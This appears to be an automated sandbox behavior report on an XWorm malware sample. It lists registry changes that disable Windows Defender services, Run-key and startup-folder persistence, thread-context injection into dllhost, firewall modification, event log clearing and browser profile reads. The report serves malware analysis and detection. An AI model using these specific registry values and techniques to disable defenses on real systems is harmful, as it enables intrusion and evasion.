| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5464 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4284 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5464 set thread context of 420 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4284 set thread context of 5312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\unpack200.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstat.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msoia.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jps.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\nmhproxy.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\pingsender.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdeps.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdb.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\os_update_handler.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javah.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsimport.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wab.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\Colors | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
